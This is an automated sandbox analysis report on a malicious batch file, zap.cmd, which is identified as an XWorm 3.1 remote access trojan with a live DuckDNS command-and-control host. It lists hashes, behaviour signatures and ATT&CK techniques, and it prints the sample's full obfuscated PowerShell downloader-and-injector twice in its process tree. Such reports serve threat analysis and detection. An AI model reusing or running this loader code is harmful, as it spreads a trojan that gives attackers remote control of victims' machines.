Analysis

  • max time kernel
    295s
  • max time network
    292s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    23-05-2024 18:05

General

  • Target

    zap.cmd

  • Size

    6KB

  • MD5

    e60c8b85dbb0822e8d7783bfbcf1373e

  • SHA1

    b82628d1e5f5990cce0fc1759db1d66d272970de

  • SHA256

    74dded6a9d78cb7d3b4f1a0141abe5c25c552583a6a1a1a2c37d3e263f611ab6

  • SHA512

    f4cd5242390b101450cd77d50c661332e042a5a49512d0421aa1aa245ed44820c4759f8db18b9643f4f29ae7ad853451b8b8bac9c76abaca85abbd4e64bd0229

  • SSDEEP

    96:3CAmMQCWs85AG8Cdzn7mhmFDSKG1obatde4MlXMQpQAqvbfq0ifcZvc+dmu29g:3CANQC5iARCdQwg122NMzQq0iUNNdmuh

Malware Config

Extracted

Family

xworm

Version

3.1

C2

xgmn934.duckdns.org:8896

Mutex

2utLZrxcByvppTdF

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zap.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Dmoner='Sub';$Dmoner+='strin';$Hensigtsmssigt = 1;$Dmoner+='g';Function Gustatorially($Dybgangens){$lymphangiitis=$Dybgangens.Length-$Hensigtsmssigt;For($Parthbr=5;$Parthbr -lt $lymphangiitis;$Parthbr+=6){$Detailprojekter+=$Dybgangens.$Dmoner.Invoke( $Parthbr, $Hensigtsmssigt);}$Detailprojekter;}function Udtrringers192($Tenophony){ . ($Femdobbelte) ($Tenophony);}$Ulvemorens=Gustatorially 'D,gdrMAmusgoProtozFuseniRigsalCut.alStudbaMisau/Fugni5Model.s.opp0Ko,hi fl e(Pr fiWLskniiGlossnstanddVideooS.hemwMoca,s Gade MultiNN terTRechr Pu,kt1Unde,0 alsl.Ar,br0Opmaa;oplys OkinaWSt,amiPl,inn A,er6Ku,ha4Skjal;Skild RadicxUnive6Sgeor4Whit.;Scale R,llyrRiddev.blat:Estop1 Teks2Is.ga1Tarti. Bh.g0Hier.)Hoved SiderGalliaeTima cGrusvkPreseoUncov/S,sse2 Rege0Ivana1Kolon0Iowah0 Flyv1Svag 0No.au1Gamme Sp llFM,ffiiSouthrGu abeAly.sfAppero Cam,xDamna/Fyrin1 ousi2Whela1Bogkl.bomhu0udma ';$Folktale=Gustatorially 'FlskeU ArissAkkoretweetr Smul- PresASemipgFyr,ne Overnp nsptGenn ';$brnesder=Gustatorially 'HovmehCi.ert.isretPar,spFemh.s Unsu:Salut/Konfi/canonwphlogwCephawGu.hi.ClerksUltimeRhabdnIagt.dCakews VivipSemiaaVerdoc Intee elie.Samfuc ,nydo Indsm,crew/ Ulcep ErysrAspenoInjur/mlposd HydrlFort,/Assastsolo.rSpi l8KrydscGangw2A eksxFlota ';$Lnudvikling134=Gustatorially ' ovti>S mmo ';$Femdobbelte=Gustatorially 'PurkeiVoksdeUnperxLno.e ';$Forholdende='Legemsbygnings';$Cycledom = Gustatorially ' brode Xeroc TaenhHo,ieoVlskb Semiu%Pap ca U enp BhutpInvigdSporoaUdfrstAnti.aGeck.%.heop\Yog,tEFra.otDrifthParaleZan,ar Tak,ivtafssBelg.eLnninrForgasNon.x.Uk ndOPorcepStraasKuns Bagag&Grund&Sacri T.inkeSu,ercUnde hVaabeoHj,ed .ulnitsvige ';Udtrringers192 (Gustatorially 'Palae$FldebgVendelSpecioH licbDi.piaAfgudl Trav:TuberJS raduSarcovH wseeApiphnflasheHiccusElatccSubseeTysten StrutElytr=S ksi(D.pencGirthmArci dAfkli Hyeto/Stru.c.ekrt Ru e$PhotoC.fslayDat.ccmyelilSonede endodTormeoTillemGring)Moder ');Udtrringers192 (Gustatorially '.aras$Ma,drgMagislLovteo,aperbStrafa Lu.tlmatal:KlderPEkstrastandrTingsiLukratattemeIns,stSkrifeUncanr rintnPolyseKobl,=Pleu,$d,ababElec,rAktion edeleMahogsT.uttdForfje Ne.trEskap. nvens Icyfp BirdlMentai Unint Fibe(bruce$Fnys,LGoavenSal.suOthe dVolumv Styri KonfkRe islJizyai .ulgn Ove,gAn im1Se.io3Anuri4An.im)Fritn ');$brnesder=$Pariteterne[0];$Spndingsfelts203= (Gustatorially 'Stru.$Spiltg Clo.lUndero BodabRerouaMisvilfor u:Kn,psOMessiu,iscotRe,rowAnlg r SkrmeHi tosPotbot ElevlSta,eeP esh2 ustr3Semim3 Mela=Or,itNBlodse Pac.wfa.lt-I,dreOStabibBa nejEffaceHemmec Del.tStvle SubmeSBlehay ForksHov,dtaa,nieSuperm Geog.Isaf,NHeksee Strit.mord.BruskWNydane AppebSprucCLorunl uropiSandkeBen.hn attt');$Spndingsfelts203+=$Juvenescent[1];Udtrringers192 ($Spndingsfelts203);Udtrringers192 (Gustatorially 'White$AllevO Mgbuu E,datUkuraw a,marOpdrie yerssHai.ht P,iolBrepieLovke2Nedre3 Gaus3Epoxy. DambH Anj,eHaanda LededSwatheForgrrVeeresKvaje[Modar$ MakuFDommeoCognalMyth.kDoddetTtesaa,traclBredse.nfla] Tele=Sjl n$VoiceUGearslIntrov UheleArsenmOdor,oa.starpointeBuc snOrg,nsT.gen ');$Arabine=Gustatorially ' Semi$AbnegOstambuOli.rtT mliwIndvirVerite DecisVelmat N.guludd,leMenui2 Rigs3Hjspn3polym.CeltiDBrepio CertwBjerrnCh rilPharsoAsteraIncapd EcclFGeneriNonfalBibl,eF,nat(.arni$overibPolemrBondenFla,beRimp,sSalamd SerieMe.vrramnio, p,nc$ prajEB.sman astfcTopkioBalleuM.mmin Joust,undbe SeporPileneattriru ifl)Out,e ';$Encounterer=$Juvenescent[0];Udtrringers192 (Gustatorially 'Ac,ou$Skovhg rddelungdoo,urvlbSilenaNonasl mo t:Hjae.FCats.oTilb,rAartie SiftsDemonh fibuoTouchwKvindn Sque=betel(G,napT HelgeMisers En.jtbolth- distPFarv a Ve,it Adoph Sync Batti$SinfuEHjeman Do ecGadedobe ieuKre.snKorrittoryseToityrUnsufeDubbirEpigr).tepg ');while (!$Foreshown) {Udtrringers192 (Gustatorially 'A.ena$ Su.pgTilralBestioPawnbbCalycaF lmllFragt:StrapE Kri,nCamert FormrBudgee yreas Do.p=Parke$Faglit,remdr erneuTosseekunde ') ;Udtrringers192 $Arabine;Udtrringers192 (Gustatorially 'HjemgSbohawtTer,aaCanunrProagtAmfit-presiS BobalBakkeeLerk,ehognopCarbo ,ilit4Iland ');Udtrringers192 (Gustatorially ' Illu$OxidagT,keml AnasoDelfibcontea Indrl Calc:BookrFinseco FderrApio.e rifsRecidhRoueco ImprwMtaalnManha=Cheso( TeleTUncome U,easCompatCleri-GravePTrappaQuarttSpeakhgen.p tomga$Un,ryEJurymn Ect,cMountotempeu Kbesnu ptit ElveeNobbirMesteeSnowsrTholl)int o ') ;Udtrringers192 (Gustatorially 'f,jlt$MataegmegallAtomsoSk.anbPettia Ju,ilDuod,: stilDDeanei .lgesLectreEkspedBrackiP,dalf .rehyGr,as3Stand7Marga=Acrid$O jusgG ronlU.conoInkambForsga T.dsl Aggr: FlorKV.calaFolkesStamckSkftne PastlOvereo eawatKapactFasteeS iranRendy+ P.in+Tem.n%Unwir$TalekPHelbraPredirDkketi Salit TimeePhonet.onine Bradr Pik.n Sjage,fatt.S,natcVermuoArvemuRes,nnP nsit U,nt ') ;$brnesder=$Pariteterne[$Disedify37];}$Biosociological=318639;$Rundbue=29425;Udtrringers192 (Gustatorially ' Over$SyndegGitril LeonoFlunkbTr rea,aktrl Opga:ProteFOutheyKnoxvr Endes,vingtRealiiKamern U.fodKommue PosisForhi2Teleg2 aker0Tests Sekan=corna DesocGbic.peKnasttBu.df-,lvtjCEgetro aakrnRed.ct StjaeProklnDowertHeck, Morge$sateeE Taxan.oddecvoeproVa,beuSandenKaraftlensge RevirFangeePal trNicol ');Udtrringers192 (Gustatorially 'Efter$ eakagSl,nil Ubego oteebAflydaEtuvelSubdu:PneumfNor.aiEnjoyrBeskfeBrestaPretrarinderTronasBalledArbejrSpi,eeCodfinrifligKompae Stat Glim= .rub Indga[SubriSUnin yTeknis BeautCapseePoonsmNrhed. EireC,ntieo,ancenskattvAfskeeOverfr IdentJoyan]ticki:Oopod: Ep.xFAfsk,rSkellodevotmHjertBSubtraprotosSrilae Evan6Sulam4 espS Pr,etOmfavr LuftiYardwnDisgugFe lb(morki$EfterFAs eny.fterrD marsHetertNona iSwellnGudfadNeosse Sta,sA gum2 Klin2Negro0Stoke)Kl en ');Udtrringers192 (Gustatorially 'Amaya$ TampgConfilOprreoUnmenbru,peapaaf.l Grad:,ekstTVejlohHasslaBetonlSk.ezamon,msPostgsPostlijorden AcomiTabu,dV lndiFe.tiaSpe ln Ther Badel=Broil Tanno[I.revSLeukoy Abs sSchertA,bumeForekm Prel.a.cesTret.ieLoka.xRabbitisido..ntaeECapitnBeed,cVikaroTerridInvitiEx,rinFi algBourg]Pensi:Fugtp:Sc,weAShackSBe.agCAchroIBoldeI.praa.Stra GOutsleVortitS effS ,umetklun.rBondsiSkrivn UnimgTnder( Gab,$Persef Episi ,ymprBeslueGazelaHandeaGl,rmr urrsAtolsdBere,r PlomeSt aln Fluog Wageeteist)Dislo ');Udtrringers192 (Gustatorially 'fle s$ OvergHyosclGene.oWh teb irkaVikkil Dogm: CreaCgerrie Kal rA.lega BegamM temaBoba l ocia=Balte$Fors TTraphhDisila ermol pfora,npinsS.vblsO teoiAds,lnOpticiarc edRecomis iriaSamm,n efou.UnwetsTestauStyreb FanasSkriftThermrulseliMiliensupe.gjudah(,nfer$EfterBexhusi loudou,errsDegreoSunnicFikekiApokooSympolOverfo,lkevgSlantiHenvec S,aaaPrci.lTotal,Nonch$SamfuRBikseu,azhynEpoped Afdebvilliu MuckeHnse )Brost ');Udtrringers192 $Ceramal;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:672
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Etherisers.Ops && echo t"
        3⤵
          PID:2204
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dmoner='Sub';$Dmoner+='strin';$Hensigtsmssigt = 1;$Dmoner+='g';Function Gustatorially($Dybgangens){$lymphangiitis=$Dybgangens.Length-$Hensigtsmssigt;For($Parthbr=5;$Parthbr -lt $lymphangiitis;$Parthbr+=6){$Detailprojekter+=$Dybgangens.$Dmoner.Invoke( $Parthbr, $Hensigtsmssigt);}$Detailprojekter;}function Udtrringers192($Tenophony){ . ($Femdobbelte) ($Tenophony);}$Ulvemorens=Gustatorially 'D,gdrMAmusgoProtozFuseniRigsalCut.alStudbaMisau/Fugni5Model.s.opp0Ko,hi fl e(Pr fiWLskniiGlossnstanddVideooS.hemwMoca,s Gade MultiNN terTRechr Pu,kt1Unde,0 alsl.Ar,br0Opmaa;oplys OkinaWSt,amiPl,inn A,er6Ku,ha4Skjal;Skild RadicxUnive6Sgeor4Whit.;Scale R,llyrRiddev.blat:Estop1 Teks2Is.ga1Tarti. Bh.g0Hier.)Hoved SiderGalliaeTima cGrusvkPreseoUncov/S,sse2 Rege0Ivana1Kolon0Iowah0 Flyv1Svag 0No.au1Gamme Sp llFM,ffiiSouthrGu abeAly.sfAppero Cam,xDamna/Fyrin1 ousi2Whela1Bogkl.bomhu0udma ';$Folktale=Gustatorially 'FlskeU ArissAkkoretweetr Smul- PresASemipgFyr,ne Overnp nsptGenn ';$brnesder=Gustatorially 'HovmehCi.ert.isretPar,spFemh.s Unsu:Salut/Konfi/canonwphlogwCephawGu.hi.ClerksUltimeRhabdnIagt.dCakews VivipSemiaaVerdoc Intee elie.Samfuc ,nydo Indsm,crew/ Ulcep ErysrAspenoInjur/mlposd HydrlFort,/Assastsolo.rSpi l8KrydscGangw2A eksxFlota ';$Lnudvikling134=Gustatorially ' ovti>S mmo ';$Femdobbelte=Gustatorially 'PurkeiVoksdeUnperxLno.e ';$Forholdende='Legemsbygnings';$Cycledom = Gustatorially ' brode Xeroc TaenhHo,ieoVlskb Semiu%Pap ca U enp BhutpInvigdSporoaUdfrstAnti.aGeck.%.heop\Yog,tEFra.otDrifthParaleZan,ar Tak,ivtafssBelg.eLnninrForgasNon.x.Uk ndOPorcepStraasKuns Bagag&Grund&Sacri T.inkeSu,ercUnde hVaabeoHj,ed .ulnitsvige ';Udtrringers192 (Gustatorially 'Palae$FldebgVendelSpecioH licbDi.piaAfgudl Trav:TuberJS raduSarcovH wseeApiphnflasheHiccusElatccSubseeTysten StrutElytr=S ksi(D.pencGirthmArci dAfkli Hyeto/Stru.c.ekrt Ru e$PhotoC.fslayDat.ccmyelilSonede endodTormeoTillemGring)Moder ');Udtrringers192 (Gustatorially '.aras$Ma,drgMagislLovteo,aperbStrafa Lu.tlmatal:KlderPEkstrastandrTingsiLukratattemeIns,stSkrifeUncanr rintnPolyseKobl,=Pleu,$d,ababElec,rAktion edeleMahogsT.uttdForfje Ne.trEskap. nvens Icyfp BirdlMentai Unint Fibe(bruce$Fnys,LGoavenSal.suOthe dVolumv Styri KonfkRe islJizyai .ulgn Ove,gAn im1Se.io3Anuri4An.im)Fritn ');$brnesder=$Pariteterne[0];$Spndingsfelts203= (Gustatorially 'Stru.$Spiltg Clo.lUndero BodabRerouaMisvilfor u:Kn,psOMessiu,iscotRe,rowAnlg r SkrmeHi tosPotbot ElevlSta,eeP esh2 ustr3Semim3 Mela=Or,itNBlodse Pac.wfa.lt-I,dreOStabibBa nejEffaceHemmec Del.tStvle SubmeSBlehay ForksHov,dtaa,nieSuperm Geog.Isaf,NHeksee Strit.mord.BruskWNydane AppebSprucCLorunl uropiSandkeBen.hn attt');$Spndingsfelts203+=$Juvenescent[1];Udtrringers192 ($Spndingsfelts203);Udtrringers192 (Gustatorially 'White$AllevO Mgbuu E,datUkuraw a,marOpdrie yerssHai.ht P,iolBrepieLovke2Nedre3 Gaus3Epoxy. DambH Anj,eHaanda LededSwatheForgrrVeeresKvaje[Modar$ MakuFDommeoCognalMyth.kDoddetTtesaa,traclBredse.nfla] Tele=Sjl n$VoiceUGearslIntrov UheleArsenmOdor,oa.starpointeBuc snOrg,nsT.gen ');$Arabine=Gustatorially ' Semi$AbnegOstambuOli.rtT mliwIndvirVerite DecisVelmat N.guludd,leMenui2 Rigs3Hjspn3polym.CeltiDBrepio CertwBjerrnCh rilPharsoAsteraIncapd EcclFGeneriNonfalBibl,eF,nat(.arni$overibPolemrBondenFla,beRimp,sSalamd SerieMe.vrramnio, p,nc$ prajEB.sman astfcTopkioBalleuM.mmin Joust,undbe SeporPileneattriru ifl)Out,e ';$Encounterer=$Juvenescent[0];Udtrringers192 (Gustatorially 'Ac,ou$Skovhg rddelungdoo,urvlbSilenaNonasl mo t:Hjae.FCats.oTilb,rAartie SiftsDemonh fibuoTouchwKvindn Sque=betel(G,napT HelgeMisers En.jtbolth- distPFarv a Ve,it Adoph Sync Batti$SinfuEHjeman Do ecGadedobe ieuKre.snKorrittoryseToityrUnsufeDubbirEpigr).tepg ');while (!$Foreshown) {Udtrringers192 (Gustatorially 'A.ena$ Su.pgTilralBestioPawnbbCalycaF lmllFragt:StrapE Kri,nCamert FormrBudgee yreas Do.p=Parke$Faglit,remdr erneuTosseekunde ') ;Udtrringers192 $Arabine;Udtrringers192 (Gustatorially 'HjemgSbohawtTer,aaCanunrProagtAmfit-presiS BobalBakkeeLerk,ehognopCarbo ,ilit4Iland ');Udtrringers192 (Gustatorially ' Illu$OxidagT,keml AnasoDelfibcontea Indrl Calc:BookrFinseco FderrApio.e rifsRecidhRoueco ImprwMtaalnManha=Cheso( TeleTUncome U,easCompatCleri-GravePTrappaQuarttSpeakhgen.p tomga$Un,ryEJurymn Ect,cMountotempeu Kbesnu ptit ElveeNobbirMesteeSnowsrTholl)int o ') ;Udtrringers192 (Gustatorially 'f,jlt$MataegmegallAtomsoSk.anbPettia Ju,ilDuod,: stilDDeanei .lgesLectreEkspedBrackiP,dalf .rehyGr,as3Stand7Marga=Acrid$O jusgG ronlU.conoInkambForsga T.dsl Aggr: FlorKV.calaFolkesStamckSkftne PastlOvereo eawatKapactFasteeS iranRendy+ P.in+Tem.n%Unwir$TalekPHelbraPredirDkketi Salit TimeePhonet.onine Bradr Pik.n Sjage,fatt.S,natcVermuoArvemuRes,nnP nsit U,nt ') ;$brnesder=$Pariteterne[$Disedify37];}$Biosociological=318639;$Rundbue=29425;Udtrringers192 (Gustatorially ' Over$SyndegGitril LeonoFlunkbTr rea,aktrl Opga:ProteFOutheyKnoxvr Endes,vingtRealiiKamern U.fodKommue PosisForhi2Teleg2 aker0Tests Sekan=corna DesocGbic.peKnasttBu.df-,lvtjCEgetro aakrnRed.ct StjaeProklnDowertHeck, Morge$sateeE Taxan.oddecvoeproVa,beuSandenKaraftlensge RevirFangeePal trNicol ');Udtrringers192 (Gustatorially 'Efter$ eakagSl,nil Ubego oteebAflydaEtuvelSubdu:PneumfNor.aiEnjoyrBeskfeBrestaPretrarinderTronasBalledArbejrSpi,eeCodfinrifligKompae Stat Glim= .rub Indga[SubriSUnin yTeknis BeautCapseePoonsmNrhed. EireC,ntieo,ancenskattvAfskeeOverfr IdentJoyan]ticki:Oopod: Ep.xFAfsk,rSkellodevotmHjertBSubtraprotosSrilae Evan6Sulam4 espS Pr,etOmfavr LuftiYardwnDisgugFe lb(morki$EfterFAs eny.fterrD marsHetertNona iSwellnGudfadNeosse Sta,sA gum2 Klin2Negro0Stoke)Kl en ');Udtrringers192 (Gustatorially 'Amaya$ TampgConfilOprreoUnmenbru,peapaaf.l Grad:,ekstTVejlohHasslaBetonlSk.ezamon,msPostgsPostlijorden AcomiTabu,dV lndiFe.tiaSpe ln Ther Badel=Broil Tanno[I.revSLeukoy Abs sSchertA,bumeForekm Prel.a.cesTret.ieLoka.xRabbitisido..ntaeECapitnBeed,cVikaroTerridInvitiEx,rinFi algBourg]Pensi:Fugtp:Sc,weAShackSBe.agCAchroIBoldeI.praa.Stra GOutsleVortitS effS ,umetklun.rBondsiSkrivn UnimgTnder( Gab,$Persef Episi ,ymprBeslueGazelaHandeaGl,rmr urrsAtolsdBere,r PlomeSt aln Fluog Wageeteist)Dislo ');Udtrringers192 (Gustatorially 'fle s$ OvergHyosclGene.oWh teb irkaVikkil Dogm: CreaCgerrie Kal rA.lega BegamM temaBoba l ocia=Balte$Fors TTraphhDisila ermol pfora,npinsS.vblsO teoiAds,lnOpticiarc edRecomis iriaSamm,n efou.UnwetsTestauStyreb FanasSkriftThermrulseliMiliensupe.gjudah(,nfer$EfterBexhusi loudou,errsDegreoSunnicFikekiApokooSympolOverfo,lkevgSlantiHenvec S,aaaPrci.lTotal,Nonch$SamfuRBikseu,azhynEpoped Afdebvilliu MuckeHnse )Brost ');Udtrringers192 $Ceramal;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1148
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Etherisers.Ops && echo t"
            4⤵
              PID:1500
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:11276

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2glmydwm.gdi.ps1
        Filesize

        1B

        MD5

        c4ca4238a0b923820dcc509a6f75849b

        SHA1

        356a192b7913b04c54574d18c28d46e6395428ab

        SHA256

        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

        SHA512

        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      • C:\Users\Admin\AppData\Roaming\Etherisers.Ops
        Filesize

        453KB

        MD5

        5ba170442dc9361bd82c89e62af29b80

        SHA1

        0b1fa0e1791eb03413106c875f0fb19113bc9ee1

        SHA256

        92c9377c83fcf01ad63607788e70752a121a0d9b3d394540b76f5fe304170674

        SHA512

        856a8d16441567d983eba5d9cd108289b6f656458df5bfb9dda8088a9b9a7ef25e7f7a5abb1b280c75609b275b4cc6d1f3483cabb3ddb7623478fdbeea8ddb50

      • memory/672-9-0x000002345CC10000-0x000002345CC32000-memory.dmp
        Filesize

        136KB

      • memory/672-12-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
        Filesize

        9.9MB

      • memory/672-13-0x0000023475280000-0x00000234752F6000-memory.dmp
        Filesize

        472KB

      • memory/672-14-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
        Filesize

        9.9MB

      • memory/672-33-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
        Filesize

        9.9MB

      • memory/672-125002-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
        Filesize

        9.9MB

      • memory/672-229-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
        Filesize

        9.9MB

      • memory/672-6-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp
        Filesize

        4KB

      • memory/672-228-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp
        Filesize

        4KB

      • memory/1148-47-0x0000000007580000-0x0000000007BA8000-memory.dmp
        Filesize

        6.2MB

      • memory/1148-48-0x00000000734B0000-0x0000000073B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/1148-50-0x0000000007D20000-0x0000000007D86000-memory.dmp
        Filesize

        408KB

      • memory/1148-51-0x0000000007D90000-0x0000000007DF6000-memory.dmp
        Filesize

        408KB

      • memory/1148-52-0x0000000007E00000-0x0000000008150000-memory.dmp
        Filesize

        3.3MB

      • memory/1148-53-0x0000000007530000-0x000000000754C000-memory.dmp
        Filesize

        112KB

      • memory/1148-54-0x0000000008550000-0x000000000859B000-memory.dmp
        Filesize

        300KB

      • memory/1148-55-0x0000000008410000-0x0000000008486000-memory.dmp
        Filesize

        472KB

      • memory/1148-70-0x0000000009BC0000-0x000000000A238000-memory.dmp
        Filesize

        6.5MB

      • memory/1148-71-0x0000000009540000-0x000000000955A000-memory.dmp
        Filesize

        104KB

      • memory/1148-76-0x00000000096A0000-0x0000000009734000-memory.dmp
        Filesize

        592KB

      • memory/1148-77-0x0000000009630000-0x0000000009652000-memory.dmp
        Filesize

        136KB

      • memory/1148-78-0x000000000A740000-0x000000000AC3E000-memory.dmp
        Filesize

        5.0MB

      • memory/1148-49-0x0000000007410000-0x0000000007432000-memory.dmp
        Filesize

        136KB

      • memory/1148-86-0x000000000AC40000-0x000000000F979000-memory.dmp
        Filesize

        77.2MB

      • memory/1148-46-0x00000000734B0000-0x0000000073B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/1148-45-0x0000000004990000-0x00000000049C6000-memory.dmp
        Filesize

        216KB

      • memory/1148-61712-0x00000000734B0000-0x0000000073B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/1148-61711-0x00000000734BE000-0x00000000734BF000-memory.dmp
        Filesize

        4KB

      • memory/1148-61713-0x00000000734B0000-0x0000000073B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/1148-44-0x00000000734BE000-0x00000000734BF000-memory.dmp
        Filesize

        4KB

      • memory/1148-124941-0x00000000734B0000-0x0000000073B9E000-memory.dmp
        Filesize

        6.9MB

      • memory/11276-64860-0x0000000002620000-0x00000000039A3000-memory.dmp
        Filesize

        19.5MB

      • memory/11276-124942-0x0000000002620000-0x000000000262E000-memory.dmp
        Filesize

        56KB

      • memory/11276-124943-0x0000000026430000-0x00000000264CC000-memory.dmp
        Filesize

        624KB

      • memory/11276-64216-0x0000000002620000-0x00000000039A3000-memory.dmp
        Filesize

        19.5MB

      • memory/11276-125003-0x0000000026770000-0x0000000026802000-memory.dmp
        Filesize

        584KB

      • memory/11276-125004-0x0000000026410000-0x000000002641A000-memory.dmp
        Filesize

        40KB